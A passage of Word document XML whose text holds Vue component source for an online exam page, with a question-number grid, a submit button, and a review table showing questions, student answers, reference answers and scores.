    <w:p w14:paraId="187BC2A1" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EE66498" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-col :span="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ADFE59" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div class="grid-content bg-purple-light"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79038215" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h3&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A25319" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div class="tihao"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A961C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;!-- &lt;span class="ti active"&gt;{{index + 1}}&lt;/span&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D9A91" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div v-for="(test, index) in tests" :key="index"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FAA2E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;span v-if="test.da.length == '0'" class="ti"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69108A10" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              {{ index + 1 }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8D8279" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;!-- {{key}} --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D31CB1" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B00B01A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;span v-else class="ti active"&gt;{{ index + 1 }}&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6470D4AC" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579BB4CE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B743960" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C9D8FE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9635D4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;el-button @click="submitCount" type="primary"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交考卷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BF0A3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B8943" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-col&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787DA67A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0768A00B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分割线，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上为考试，下为错题复现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D07413" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;div v-if="tableData &amp;&amp; tableData.length"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F01F1F0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-table :data="tableData" stripe style="width: 100%" class="scroll-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB79C1" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356A9471" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CD76C9" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="500"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952DEA6" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B347A25" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style="white-space: nowrap; overflow: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EB03D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          {{ row.exam_question }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBE2FC" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3FBAB0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E99CF3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436D3CB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3667F175" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;!-- &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主客</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="60"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA6DFC2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E2EF8B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          {{ row.sub_obj }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C67B5" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F37E24" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B20CA" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E65CD03" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学生答案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="200"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276A795" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D07E182" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style="white-space: nowrap; overflow: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12632507" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {{ row.stu_answer }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00902722" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539EF8F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8213D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FC96E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAF8638" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BD0150" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考答案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="300"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E83447" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2A55F2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style="white-space: nowrap; overflow: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362FE9B3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {{ row.reference_answer }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67254820" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4CD423" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A72F464" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37168A94" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76CF18F8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FDCDB2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="300"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8D2DA" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D969E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style="white-space: nowrap; overflow: auto;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297F652" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {{ row.choice_text }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1870F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333735BF" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815BE6B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25370D80" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C0DC04A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;el-table-column label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" align="center" width="60"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696BA16" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;template #default="{ row }"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DCAB7" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          {{ row.score }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52069776" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ED608F" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/el-table-column&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9E2DDB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51521794" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F6D9E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD32F8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34993580" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A64E6E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1BD77C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { toast } from "~/composables/util"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66267DE5" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { ElMessageBox } from 'element-plus';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8AFD4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { get_exam_paper, submit_exam_paper, detect_examed, get_old_results } from "~/api/examing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613E3899" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import { useRouter } from 'vue-router';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0E24AB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A17ADA" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F2E904" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  name: "examing",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E226E8" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB4DB4" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
    </w:p>
